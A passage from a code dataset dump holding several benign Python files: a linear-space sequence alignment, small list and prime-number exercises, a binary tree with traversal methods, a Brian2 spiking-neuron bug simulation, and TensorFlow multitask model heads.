findMiddleEdge(s1, s2, indelPen):\n left = s2[:len(s2)//2]\n right = s2[len(s2)//2:]\n matFromLeft, _ = LCSalignmentScore(s1, left, indelPen)\n matFromRight, bt_right = LCSalignmentScore(s1[::-1], right[::-1], indelPen)\n\n matFromRight = matFromRight[::-1]\n bt_right = bt_right[::-1]\n\n vertStart = 0\n horizontalStart = len(left)\n horizontalEnd = len(left)\n midEdgeSum = matFromLeft[0][1] + matFromRight[0][1]\n\n for i in range(len(matFromLeft)):\n if matFromLeft[i][1] + matFromRight[i][1] > midEdgeSum:\n midEdgeSum = matFromLeft[i][1] + matFromRight[i][1]\n vertStart = i\n\n vertEnd = vertStart\n if bt_right[vertStart] == 'diag':\n vertEnd += 1\n horizontalEnd += 1\n elif bt_right[vertStart] == 'down':\n vertEnd += 1\n elif bt_right[vertStart] == 'right':\n horizontalEnd += 1\n\n # return [(vertStart, horizontalStart), (vertEnd, horizontalEnd)] # for problem 46 - Rosalind\n return [(vertStart,horizontalStart), bt_right[vertStart]]\n\n\ndef linearSpaceAlignment(top, bottom, left, right, s1, s2):\n indelPen = 5\n alignment = ['','']\n if left == right:\n for i in range(top, bottom):\n alignment[0] += s1[i]\n alignment[1] += '-'\n return alignment\n if top == bottom:\n for i in range(left, right):\n alignment[1] += s2[i]\n alignment[0] += '-'\n return alignment\n\n (midVert, midHoriz), midEdge = findMiddleEdge(s1[top:bottom], s2[left:right], indelPen)\n midVert += top\n midHoriz += left\n\n alignment = linearSpaceAlignment(top, midVert, left, midHoriz, s1, s2)\n\n if midEdge == 'diag':\n alignment[0] += s1[midVert]\n alignment[1] += s2[midHoriz]\n midVert += 1\n midHoriz += 1\n elif midEdge == 'right':\n alignment[0] += '-'\n alignment[1] += s2[midHoriz]\n midHoriz += 1\n elif midEdge == 'down':\n alignment[0] += s1[midVert]\n alignment[1] += '-'\n midVert += 1\n\n newAlig = linearSpaceAlignment(midVert, bottom, midHoriz, right, s1, s2)\n alignment[0] += newAlig[0]\n alignment[1] += newAlig[1]\n\n return alignment\n\ndef calcScore(alignment, indelPen):\n s1 = alignment[0]\n s2 = alignment[1]\n score = 0\n for i in range(len(s1)):\n if s1[i] == '-' or s2[i] == '-':\n score -= indelPen\n else:\n score += getScoreValue(s1[i], s2[i])\n\n 
return score\n\nwith open('test.txt', 'r+') as f:\n s1 = f.readline().rstrip()\n s2 = f.readline().rstrip()\n\n\n indelPen = 5\n alignment = linearSpaceAlignment(0, len(s1), 0, len(s2), s1, s2)\n score = calcScore(alignment, indelPen)\n print(score)\n\n print('\\n'.join(alignment))\n","sub_path":"LinearSpaceAlignment.py","file_name":"LinearSpaceAlignment.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"581894454","text":"# chop() removes first and last elements of a list, returns None\n# middle() takes a list, returns new list without first and last elements\n\nfirst_list = ['a', 'b', 'c', 'd', 'e']\nsecond_list = ['f', 'g', 'h', 'i', 'j']\n\ndef chop(first_list) :\n del first_list[0]\n del first_list[len(first_list)-1]\n\ndef middle(second_list) :\n new_list = list(second_list)\n return new_list[1:-1] # note how to pull the last item in a new_list\n\nprint('First list:', first_list)\nprint('Modified first list:', chop(first_list))\n\nprint('Second list:', second_list)\nprint('Modified copy of second list:', middle(second_list))\n","sub_path":"src/0_string_list_chopper.py","file_name":"0_string_list_chopper.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"397388236","text":"import math\r\ndef find_num(N):\r\n n = int(math.sqrt(N))\r\n for i in range(1, n+1):\r\n if i == 1:\r\n continue\r\n if N%i == 0:\r\n return False\r\n return True\r\n\r\nM = int(input())\r\nN = int(input())\r\ncount = 0\r\nL = []\r\n\r\nfor i in range(M, N+1):\r\n if i == 1:\r\n continue\r\n if find_num(i):\r\n count += 1\r\n L.append(i)\r\n\r\nprint(sum(L))\r\nprint(min(L))\r\n","sub_path":"CodeUp/hyung_seop/4566.py","file_name":"4566.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550589826","text":"class Node:\n \"\"\"\n Inserting into a Tree\n\n To insert into a tree we use the same node class created above and add an insert method to it The insert method\n compares the value of the node to the parent node and decides to add it as a left node or a right node.\n\n Traversing a Tree\n The tree can be traversed by deciding on a sequence to visit each node. As we can clearly see we can start at a node\n then visit the left sub-tree first and right sub-tree next. Or we can also visit the right sub-tree first and left\n sub-tree next. Accordingly there are different names for these tree traversal methods.\n\n Traversal is a process to visit all the nodes of a tree and may print their values too. Because, all nodes are connected\n via edges (links) we always start from the root (head) node. That is, we cannot randomly access a node in a tree. There\n are three ways which we use to traverse a tree −\n\n In-order Traversal\n Pre-order Traversal\n Post-order Traversal\n\n In-order Traversal\n In this traversal method, the left subtree is visited first, then the root and later the right sub-tree. We should\n always remember that every node may represent a subtree itself.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Inorder traversal logic is\n implemented by creating an empty list and adding the left node first followed by the root or parent node. 
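# --- Editor's note (hedged sketch) -------------------------------------
# The LinearSpaceAlignment record above is Hirschberg's algorithm: score
# one column of the DP table in O(len(s1)) memory, then split s2 at its
# midpoint where forward and backward scores sum to the maximum, which is
# exactly what findMiddleEdge does. A compact sketch with a fixed
# match/mismatch score instead of the BLOSUM62 table; names here are
# illustrative only.
def nw_score(s1, s2, match=1, mismatch=-1, indel=-5):
    """prev[i] = best score of aligning s1[:i] against all of s2."""
    prev = [i * indel for i in range(len(s1) + 1)]
    for j in range(1, len(s2) + 1):
        cur = [j * indel]
        for i in range(1, len(s1) + 1):
            sub = match if s1[i - 1] == s2[j - 1] else mismatch
            cur.append(max(prev[i - 1] + sub,    # align s1[i-1] with s2[j-1]
                           prev[i] + indel,      # gap in s1
                           cur[i - 1] + indel))  # gap in s2
        prev = cur
    return prev

s1, s2 = "PLEASANTLY", "MEANLY"
half = len(s2) // 2
fwd = nw_score(s1, s2[:half])
bwd = nw_score(s1[::-1], s2[half:][::-1])[::-1]  # scores of s1[i:] vs s2[half:]
mid_i = max(range(len(fwd)), key=lambda i: fwd[i] + bwd[i])
print("optimal path crosses column", half, "at row", mid_i)
# -----------------------------------------------------------------------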
At last\n the left node is added to complete the Inorder traversal. Please note that this process is repeated for each\n sub-tree until all the nodes are traversed.\n\n Pre-order Traversal\n In this traversal method, the root node is visited first, then the left subtree and finally the right subtree.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Pre-order traversal logic is\n implemented by creating an empty list and adding the root node first followed by the left node. At last the right\n node is added to complete the Pre-order traversal. Please note that this process is repeated for each sub-tree until\n all the nodes are traversed.\n\n Post-order Traversal\n In this traversal method, the root node is visited last, hence the name. First we traverse the left subtree, then\n the right subtree and finally the root node.\n\n In the below python program, we use the Node class to create place holders for the root node as well as the left and\n right nodes. Then we create a insert function to add data to the tree. Finally the Post-order traversal logic is\n implemented by creating an empty list and adding the left node first followed by the right node. At last the root or\n parent node is added to complete the Post-order traversal. Please note that this process is repeated for each\n sub-tree until all the nodes are traversed.\n\n \"\"\"\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n\n # Insert Node\n def insert(self, data):\n if self.data:\n if data < self.data:\n if self.left is None:\n self.left = Node(data)\n else:\n self.left.insert(data)\n elif data > self.data:\n if self.right is None:\n self.right = Node(data)\n else:\n self.right.insert(data)\n else:\n self.data = data\n\n # Print the Tree\n def PrintTree(self):\n if self.left:\n self.left.PrintTree()\n print(self.data),\n if self.right:\n self.right.PrintTree()\n\n # Inorder traversal\n # Left -> Root -> Right\n def inorder_traversal(self, root):\n res = []\n if root:\n res = self.inorder_traversal(root.left)\n res.append(root._data)\n res = res + self.inorder_traversal(root.right)\n return res\n\n # Preorder traversal\n # Root -> Left ->Right\n def preorder_traversal(self, root):\n res = []\n if root:\n res.append(root._data)\n res = res + self.preorder_traversal(root.left)\n res = res + self.preorder_traversal(root.right)\n return res\n # Postorder traversal\n # Left ->Right -> Root\n def postorder_traversal(self, root):\n res = []\n if root:\n res = self.postorder_traversal(root.left)\n res = res + self.postorder_traversal(root.right)\n res.append(root._data)\n return res\n\n\nif __name__ == \"__main__\":\n\n root = Node(27)\n root.insert(14)\n root.insert(35)\n root.insert(10)\n root.insert(19)\n root.insert(31)\n root.insert(42)\n root.PrintTree()\n print(root.inorder_traversal(root))\n print(root.preorder_traversal(root))\n print(root.postorder_traversal(root))","sub_path":"ds2_tree.py","file_name":"ds2_tree.py","file_ext":"py","file_size_in_byte":5072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609895349","text":"from brian2 import *\nimport matplotlib.pyplot as plt\n\nmap_size = 100\nglobal foodx, foody, food_count, bug_plot, food_plot, sr_plot, sl_plot, outbugx, outbugy, outbugang, outfoodx, outfoody, outsrx, outsry, outslx, outsly\n\nfood_count = 0\nfoodx = 50\nfoody = 
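# --- Editor's note -----------------------------------------------------
# Bug in the ds2_tree record above: Node.__init__ stores the value as
# self.data, but all three traversal methods read root._data, so calling
# them raises AttributeError. The fix is root.data throughout; a
# corrected in-order traversal as a standalone function over the same
# Node class:
def inorder(root):
    """Left -> root -> right, using node.data as set in Node.__init__."""
    if root is None:
        return []
    return inorder(root.left) + [root.data] + inorder(root.right)
# -----------------------------------------------------------------------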
50\nduration = 50\noutbugx = np.zeros(int(duration / 2))\noutbugy = np.zeros(int(duration / 2))\noutbugang = np.zeros(int(duration / 2))\noutfoodx = np.zeros(int(duration / 2))\noutfoody = np.zeros(int(duration / 2))\noutsrx = np.zeros(int(duration / 2))\noutsry = np.zeros(int(duration / 2))\noutslx = np.zeros(int(duration / 2))\noutsly = np.zeros(int(duration / 2))\n\n# Sensor neurons\na = 0.02\nb = 0.2\nc = -65\nd = 0.5\n\n\nI0 = 1250\ntau_ampa = 1.0 * ms\ng_synpk = 0.4\ng_synmaxval = (g_synpk / (tau_ampa / ms * exp(-1)))\n\nsensor_eqs = '''\n\nx : 1\ny : 1\nx_disp : 1\ny_disp : 1\nfoodxx : 1\nfoodyy : 1\nmag :1\nI = I0 / sqrt(((x-foodxx)**2+(y-foodyy)**2)): 1\n\ndv/dt = (fv - u + mag*I + z*(0-v))/ms : 1\ndz/dt = -z/tau_ampa : 1\nfv = 0.04*v**2 + 5*v + 140 : 1\ndu/dt = a*(b*v - u)/ms : 1\n'''\n\nsensor_reset = '''\nv = c\nu = u + d\n'''\n\nsr = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsr.v = c\nsr.u = c * b\nsr.x_disp = 5\nsr.y_disp = 5\nsr.x = sr.x_disp\nsr.y = sr.y_disp\nsr.foodxx = foodx\nsr.foodyy = foody\nsr.mag = 1\n\nsl = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsl.v = c\nsl.u = c * b\nsl.x_disp = -5\nsl.y_disp = 5\nsl.x = sl.x_disp\nsl.y = sl.y_disp\nsl.foodxx = foodx\nsl.foodyy = foody\nsl.mag = 1\n\nsbr = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsbr.v = c\nsbr.u = c * b\nsbr.foodxx = foodx\nsbr.foodyy = foody\nsbr.mag = 0\n\nsbl = NeuronGroup(1, sensor_eqs, clock=Clock(0.2 * ms), threshold=\"v>=30\", reset=sensor_reset, method='euler')\nsbl.v = c\nsbl.u = c * b\nsbl.foodxx = foodx\nsbl.foodyy = foody\nsbl.mag = 0\n\n# The virtual bug\n\ntaum = 4 * ms\nbase_speed = 9.5\nturn_rate = 5 * Hz\n\nbug_eqs = '''\n#equations for movement here\ndx/dt = motor * cos(angle)/ms : 1\ndy/dt = motor * sin(angle) /ms : 1\nmotor = (motorl + motorr)/2 : 1\ndangle/dt = ((motorr - motorl)/(5*sqrt(2)))/ms : 1\ndmotorl/dt = - (motorl/taum) : 1\ndmotorr/dt = - (motorr/taum) : 1\n\n'''\n\nbug = NeuronGroup(1, bug_eqs, clock=Clock(0.2 * ms), method='euler')\nbug.motorl = 0\nbug.motorr = 0\nbug.angle = pi / 2\nbug.x = 0\nbug.y = 0\n\n# Synapses (sensors communicate with bug motor)\nw = 10\nsyn_rr = Synapses(sr, sbl, clock=Clock(0.2 * ms), model='''\n g_synmax:1\n ''',\n on_pre='''\n\t\tz+= g_synmax\n\t\t''')\n\nsyn_rr.connect(i=[0], j=[0])\nsyn_rr.g_synmax = g_synmaxval\n\nsyn_ll = Synapses(sl, sbr, clock=Clock(0.2 * ms), model='''\n g_synmax:1\n ''',\n on_pre='''\n\t\tz+= g_synmax\n\t\t''')\n\nsyn_ll.connect(i=[0], j=[0])\nsyn_ll.g_synmax = g_synmaxval\n\nsyn_r = Synapses(sbr, bug, clock=Clock(0.2 * ms), on_pre='motorr += w')\nsyn_r.connect(i=[0], j=[0])\nsyn_l = Synapses(sbl, bug, clock=Clock(0.2 * ms), on_pre='motorl += w')\nsyn_l.connect(i=[0], j=[0])\n\n# Step for show figure\nstep = 0\nf = figure(1)\nbug_plot = plot(bug.x, bug.y, 'ko')\nfood_plot = plot(foodx, foody, 'b*')\nsr_plot = plot([0], [0], 'w') # Just leaving it blank for now\nsl_plot = plot([0], [0], 'w')\ntitle(\"Time: \"+str(2*step)+\"ms\")\n\n\n# Additional update rules (not covered/possible in above eqns)\n\n@network_operation()\ndef update_positions():\n\n global foodx, foody, food_count\n sr.x = bug.x + sr.x_disp * sin(bug.angle) + sr.y_disp * cos(bug.angle)\n sr.y = bug.y + - sr.x_disp * cos(bug.angle) + sr.y_disp * sin(bug.angle)\n\n sl.x = bug.x + sl.x_disp * sin(bug.angle) + sl.y_disp * cos(bug.angle)\n sl.y = bug.y - sl.x_disp * 
cos(bug.angle) + sl.y_disp * sin(bug.angle)\n\n if ((bug.x - foodx) ** 2 + (bug.y - foody) ** 2) < 16:\n food_count += 1\n foodx = randint(-map_size + 10, map_size - 10)\n foody = randint(-map_size + 10, map_size - 10)\n\n if (bug.x < -map_size):\n bug.x = -map_size\n bug.angle = pi - bug.angle\n if (bug.x > map_size):\n bug.x = map_size\n bug.angle = pi - bug.angle\n if (bug.y < -map_size):\n bug.y = -map_size\n bug.angle = -bug.angle\n if (bug.y > map_size):\n bug.y = map_size\n bug.angle = -bug.angle\n\n sr.foodxx = foodx\n sr.foodyy = foody\n sl.foodxx = foodx\n sl.foodyy = foody\n\n\n@network_operation(dt=2 * ms)\ndef update_plot(t):\n global foodx, foody, bug_plot, food_plot, sr_plot, sl_plot, outbugx, outbugy, outbugang, outfoodx, outfoody, outsrx, outsry, outslx, outsly, step\n step += 1\n if step % 10 == 0:\n print('Close all figures')\n plt.close('all')\n indx = int(.5 * t / ms + 1)\n bug_plot[0].remove()\n food_plot[0].remove()\n sr_plot[0].remove()\n sl_plot[0].remove()\n bug_x_coords = [bug.x, bug.x - 4 * cos(bug.angle), bug.x - 8 * cos(bug.angle)] # ant-like body\n bug_y_coords = [bug.y, bug.y - 4 * sin(bug.angle), bug.y - 8 * sin(bug.angle)]\n outbugx[indx - 1] = bug.x[0]\n outbugy[indx - 1] = bug.y[0]\n outbugang[indx - 1] = bug.angle[0]\n outfoodx[indx - 1] = foodx\n outfoody[indx - 1] = foody\n outsrx[indx - 1] = sr.x[0]\n outsry[indx - 1] = sr.y[0]\n outslx[indx - 1] = sl.x[0]\n outsly[indx - 1] = sl.y[0]\n bug_plot = plot(bug_x_coords, bug_y_coords, 'ko') # Plot the bug's current position\n sr_plot = plot([bug.x, sr.x], [bug.y, sr.y], 'b')\n sl_plot = plot([bug.x, sl.x], [bug.y, sl.y], 'r')\n food_plot = plot(foodx, foody, 'b*')\n axis([-100, 100, -100, 100])\n title(\"Time: \"+str(2*step)+\"ms\")\n draw()\n\n # print \".\"\n pause(0.05)\n\n\n# ML = StateMonitor(sl, ('v', 'I'), record=True)\n# MR = StateMonitor(sr, ('v', 'I'), record=True)\n# MB = StateMonitor(bug, ('motorl', 'motorr', 'speed', 'angle', 'x', 'y'), record = True)\nrun(duration * ms, report='text')\nnp.save('outbugx', outbugx)\nnp.save('outbugy', outbugy)\nnp.save('outbugang', outbugang)\nnp.save('outfoodx', outfoodx)\nnp.save('outfoody', outfoody)\nnp.save('outsrx', outsrx)\nnp.save('outsry', outsry)\nnp.save('outslx', outslx)\nnp.save('outsly', outsly)\n\n\n\n\n\n\n\n\n\n","sub_path":"Exploration3/braitenbug_brain_skel2018.py","file_name":"braitenbug_brain_skel2018.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528531379","text":"import transformers\nfrom bert_multitask_learning.params import BaseParams\nimport tensorflow as tf\nfrom typing import Dict, Tuple\nfrom tensorflow_addons.layers.crf import CRF\nfrom tensorflow_addons.text.crf import crf_log_likelihood\nimport tensorflow_addons as tfa\n\nfrom . 
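# --- Editor's note (hedged sketch) -------------------------------------
# In the Brian2 record above, update_positions places each sensor by
# rotating its body-frame offset (x_disp, y_disp) by the bug's heading.
# Isolated as a plain helper the geometry is easy to check; the function
# name is illustrative, not from the record.
from math import sin, cos, pi

def sensor_position(bug_x, bug_y, angle, x_disp, y_disp):
    """World coordinates of a sensor mounted at (x_disp, y_disp) on the bug."""
    sx = bug_x + x_disp * sin(angle) + y_disp * cos(angle)
    sy = bug_y - x_disp * cos(angle) + y_disp * sin(angle)
    return sx, sy

# Initial heading in the record is pi/2 (pointing up):
print(sensor_position(0.0, 0.0, pi / 2, 5, 5))    # ~( 5.0, 5.0), right sensor
print(sensor_position(0.0, 0.0, pi / 2, -5, 5))   # ~(-5.0, 5.0), left sensor
# -----------------------------------------------------------------------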
import modeling\nfrom .utils import load_transformer_model\nfrom .top_utils import gather_indexes\n\nfrom functools import partial\n\n\n@tf.function\ndef empty_tensor_handling_loss(labels, logits, loss_fn):\n    if tf.equal(tf.size(labels), 0):\n        return 0.0\n    if tf.equal(tf.size(tf.shape(labels)), 0):\n        return 0.0\n    if tf.equal(tf.shape(labels)[0], 0):\n        return 0.0\n    else:\n        return tf.reduce_mean(loss_fn(\n            labels, logits, from_logits=True))\n\n\nclass SequenceLabel(tf.keras.Model):\n    def __init__(self, params: BaseParams, problem_name: str):\n        super(SequenceLabel, self).__init__(name=problem_name)\n        self.params = params\n        self.problem_name = problem_name\n        num_classes = self.params.num_classes[self.problem_name]\n        self.dense = tf.keras.layers.Dense(num_classes, activation=None)\n\n        self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)\n\n        if self.params.crf:\n            self.crf = CRF(num_classes)\n            self.metric_fn = tf.keras.metrics.Accuracy(\n                name='{}_acc'.format(self.problem_name)\n            )\n        else:\n            self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(\n                name='{}_acc'.format(self.problem_name))\n\n    def return_crf_result(self, labels: tf.Tensor, logits: tf.Tensor, mode: str, input_mask: tf.Tensor):\n        input_mask.set_shape([None, None])\n        viterbi_decoded, potentials, sequence_length, chain_kernel = self.crf(\n            logits, input_mask)\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            loss = -crf_log_likelihood(potentials,\n                                       labels, sequence_length, chain_kernel)[0]\n            loss = tf.reduce_mean(loss)\n            self.add_loss(loss)\n            acc = self.metric_fn(\n                labels, viterbi_decoded, sample_weight=input_mask)\n            self.add_metric(acc)\n\n        # make the CRF prediction have the same shape as the non-CRF prediction\n        return tf.one_hot(viterbi_decoded, name='%s_predict' % self.problem_name, depth=self.params.num_classes[self.problem_name])\n\n    def call(self, inputs, mode):\n        training = (mode == tf.estimator.ModeKeys.TRAIN)\n        feature, hidden_feature = inputs\n        hidden_feature = hidden_feature['seq']\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            labels = feature['{}_label_ids'.format(self.problem_name)]\n            # sometimes the length of labels does not equal the length of inputs;\n            # that's caused by tf.data.experimental.bucket_by_sequence_length in a multi-problem scenario\n            pad_len = tf.shape(input=hidden_feature)[\n                1] - tf.shape(input=labels)[1]\n\n            # top, bottom, left, right\n            pad_tensor = [[0, 0], [0, pad_len]]\n            labels = tf.pad(tensor=labels, paddings=pad_tensor)\n\n        else:\n            labels = None\n        hidden_feature = self.dropout(hidden_feature, training)\n\n        if self.params.crf:\n            return self.return_crf_result(labels, hidden_feature, mode, feature['model_input_mask'])\n\n        logits = self.dense(hidden_feature)\n\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            loss = empty_tensor_handling_loss(\n                labels, logits,\n                tf.keras.losses.sparse_categorical_crossentropy)\n            self.add_loss(loss)\n            acc = self.metric_fn(\n                labels, logits, sample_weight=feature['model_input_mask'])\n            self.add_metric(acc)\n        return tf.nn.softmax(\n            logits, name='%s_predict' % self.problem_name)\n\n\nclass Classification(tf.keras.layers.Layer):\n    def __init__(self, params: BaseParams, problem_name: str) -> None:\n        super(Classification, self).__init__(name=problem_name)\n        self.params = params\n        self.problem_name = problem_name\n        num_classes = self.params.num_classes[self.problem_name]\n        self.dense = tf.keras.layers.Dense(num_classes, activation=None)\n        self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(\n            name='{}_acc'.format(self.problem_name))\n\n        self.dropout = 
tf.keras.layers.Dropout(1-params.dropout_keep_prob)\n\n    def call(self, inputs, mode):\n        training = (mode == tf.estimator.ModeKeys.TRAIN)\n        feature, hidden_feature = inputs\n        hidden_feature = hidden_feature['pooled']\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            labels = feature['{}_label_ids'.format(self.problem_name)]\n        else:\n            labels = None\n        hidden_feature = self.dropout(hidden_feature, training)\n        logits = self.dense(hidden_feature)\n\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            labels = tf.squeeze(labels)\n            # convert labels to one-hot to use label_smoothing\n            one_hot_labels = tf.one_hot(\n                labels, depth=self.params.num_classes[self.problem_name])\n            loss_fn = partial(tf.keras.losses.categorical_crossentropy,\n                              from_logits=True, label_smoothing=self.params.label_smoothing)\n\n            loss = empty_tensor_handling_loss(\n                one_hot_labels, logits,\n                loss_fn)\n            self.add_loss(loss)\n            acc = self.metric_fn(labels, logits)\n            self.add_metric(acc)\n        return tf.nn.softmax(\n            logits, name='%s_predict' % self.problem_name)\n\n\nclass PreTrain(tf.keras.Model):\n    def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.Tensor):\n        super(PreTrain, self).__init__(name=problem_name)\n        self.params = params\n        self.nsp = transformers.modeling_tf_bert.TFBertNSPHead(\n            self.params.bert_config)\n\n        # TODO: add mlm back to pretrain\n        self.mlm = transformers.modeling_tf_bert.TFBertMLMHead(\n            self.params.bert_config, input_embeddings=input_embeddings)\n\n    def call(self,\n             inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],\n             mode: str) -> Tuple[tf.Tensor, tf.Tensor]:\n        features, hidden_features = inputs\n\n        # compute logits\n        nsp_logits = self.nsp(hidden_features['pooled'])\n\n        # masking is done inside the model\n        seq_hidden_feature = hidden_features['seq']\n        positions = features['masked_lm_positions']\n\n        # gather_indexes will flatten the seq hidden_states, we need to reshape\n        # back to 3d tensor\n        input_tensor = gather_indexes(seq_hidden_feature, positions)\n        shape_tensor = tf.shape(positions)\n        shape_list = tf.concat([shape_tensor, [-1]], axis=0)\n        input_tensor = tf.reshape(input_tensor, shape=shape_list)\n        # set_shape to determine rank\n        input_tensor.set_shape(\n            [None, None, seq_hidden_feature.shape.as_list()[-1]])\n        mlm_logits = self.mlm(input_tensor)\n\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            nsp_labels = tf.squeeze(\n                features['next_sentence_label_ids'])\n            mlm_labels = features['masked_lm_ids']\n            mlm_labels.set_shape([None, None])\n            # compute loss\n            nsp_loss = empty_tensor_handling_loss(\n                nsp_labels, nsp_logits,\n                tf.keras.losses.sparse_categorical_crossentropy)\n            mlm_loss_layer = transformers.modeling_tf_utils.TFMaskedLanguageModelingLoss()\n            # mlm_loss = tf.reduce_mean(\n            #     mlm_loss_layer.compute_loss(mlm_labels, mlm_logits))\n\n            # add a useless from_logits argument to match the function signature of keras losses.\n            def loss_fn_wrapper(labels, logits, from_logits=True):\n                return mlm_loss_layer.compute_loss(labels, logits)\n            mlm_loss = empty_tensor_handling_loss(\n                mlm_labels,\n                mlm_logits,\n                loss_fn_wrapper\n            )\n            loss = nsp_loss + mlm_loss\n            self.add_loss(loss)\n\n        return (tf.sigmoid(nsp_logits), tf.nn.softmax(mlm_logits))\n\n\nclass Seq2Seq(tf.keras.Model):\n    def __init__(self, params: BaseParams, problem_name: str):\n        super(Seq2Seq, self).__init__(name=problem_name)\n        self.params = params\n        self.problem_name = problem_name\n        if self.params.init_weight_from_huggingface:\n            self.decoder = load_transformer_model(\n                
self.params.transformer_decoder_model_name,\n self.params.transformer_decoder_model_loading)\n else:\n self.decoder = load_transformer_model(\n self.params.bert_decoder_config, self.params.transformer_decoder_model_loading)\n\n def call(self,\n inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],\n mode: str):\n features, hidden_features = inputs\n encoder_output = hidden_features['seq']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = features['%s_label_ids' % self.problem_name]\n label_mask = features['{}_mask'.format(self.problem_name)]\n encoder_mask = features['model_input_mask']\n\n # batch_loss, logits, hidden_states of all layers\n batch_loss, logits, _ = self.decoder({'input_ids': labels,\n 'attention_mask': label_mask,\n 'encoder_hidden_states': encoder_output,\n 'encoder_attention_mask': encoder_mask,\n 'labels': labels})\n\n # loss = self.create_loss(\n # batch_loss, features['%s_loss_multiplier' % problem_name])\n # # If a batch does not contain input instances from the current problem, the loss multiplier will be empty\n # # and loss will be NaN. Replacing NaN with 0 fixes the problem.\n # loss = tf.compat.v1.where( # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n # tf.math.is_nan(loss), tf.zeros_like(loss), loss)\n loss = tf.reduce_mean(batch_loss)\n self.add_loss(loss)\n return tf.nn.softmax(logits)\n\n else:\n bos_id = self.params.bos_id\n init_tensor = tf.ones(\n (tf.shape(encoder_output)[0], 1), dtype=tf.int32) * bos_id\n eos_id = self.params.eos_id\n pred = self.decoder.generate(\n input_ids=init_tensor,\n max_length=self.params.decode_max_seq_len,\n min_length=2,\n early_stopping=True,\n num_beams=self.params.beam_size,\n bos_token_id=bos_id,\n eos_token_id=eos_id,\n use_cache=True\n )\n return pred\n\n\n# class Seq2Seq(TopLayer):\n# # pylint: disable=attribute-defined-outside-init\n# '''Top model for seq2seq problem.\n# This is basically a decoder of encoder-decoder framework.\n# Here uses transformer decoder architecture with beam search support.\n# '''\n\n# def __call__(self, features, hidden_feature, mode, problem_name):\n# self.decoder = load_transformer_model(\n# self.params.transformer_decoder_model_name,\n# self.params.transformer_decoder_model_loading)\n# scope_name = self.params.share_top[problem_name]\n# encoder_output = hidden_feature['seq']\n# if mode != tf.estimator.ModeKeys.PREDICT:\n# labels = features['%s_label_ids' % problem_name]\n# label_mask = features['{}_mask'.format(problem_name)]\n# encoder_mask = features['model_input_mask']\n\n# batch_loss, logits = self.decoder({'input_ids': labels,\n# 'attention_mask': label_mask,\n# 'encoder_hidden_states': encoder_output,\n# 'encoder_attention_mask': encoder_mask,\n# 'labels': labels})\n\n# # loss = self.create_loss(\n# # batch_loss, features['%s_loss_multiplier' % problem_name])\n# # # If a batch does not contain input instances from the current problem, the loss multiplier will be empty\n# # # and loss will be NaN. 
Replacing NaN with 0 fixes the problem.\n# # loss = tf.compat.v1.where( # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n# # tf.math.is_nan(loss), tf.zeros_like(loss), loss)\n# loss = tf.reduce_mean(batch_loss)\n# self.loss = loss\n\n# if mode == tf.estimator.ModeKeys.TRAIN:\n# return self.loss\n# else:\n# return self.eval_metric_fn(\n# features, logits, loss, problem_name, features['%s_mask' % problem_name])\n\n# else:\n# bos_id = self.params.bos_id\n# init_tensor = tf.ones(\n# (tf.shape(encoder_output)[0], 1), dtype=tf.int32) * bos_id\n# eos_id = self.params.eos_id\n# self.pred = tf.identity(self.decoder.generate(\n# input_ids=init_tensor,\n# max_length=self.params.decode_max_seq_len,\n# min_length=2,\n# early_stopping=True,\n# num_beams=self.params.beam_size,\n# bos_token_id=bos_id,\n# eos_token_id=eos_id,\n# use_cache=True\n# ),\n# name='%s_predict' % scope_name)\n# return self.pred\n\n\nclass MultiLabelClassification(tf.keras.layers.Layer):\n def __init__(self, params: BaseParams, problem_name: str) -> None:\n super(MultiLabelClassification, self).__init__(name=problem_name)\n self.params = params\n self.problem_name = problem_name\n self.dense = tf.keras.layers.Dense(\n self.params.num_classes[problem_name])\n self.dropout = tf.keras.layers.Dropout(\n 1-self.params.dropout_keep_prob\n )\n self.metric_fn = tfa.metrics.F1Score(\n num_classes=self.params.num_classes[problem_name],\n threshold=self.params.multi_cls_threshold,\n average='macro',\n name='{}_f1'.format(problem_name))\n\n def call(self, inputs, mode):\n training = (mode == tf.estimator.ModeKeys.TRAIN)\n feature, hidden_feature = inputs\n hidden_feature = hidden_feature['pooled']\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = feature['{}_label_ids'.format(self.problem_name)]\n else:\n labels = None\n hidden_feature = self.dropout(hidden_feature, training)\n logits = self.dense(hidden_feature)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n labels = tf.squeeze(labels)\n labels = 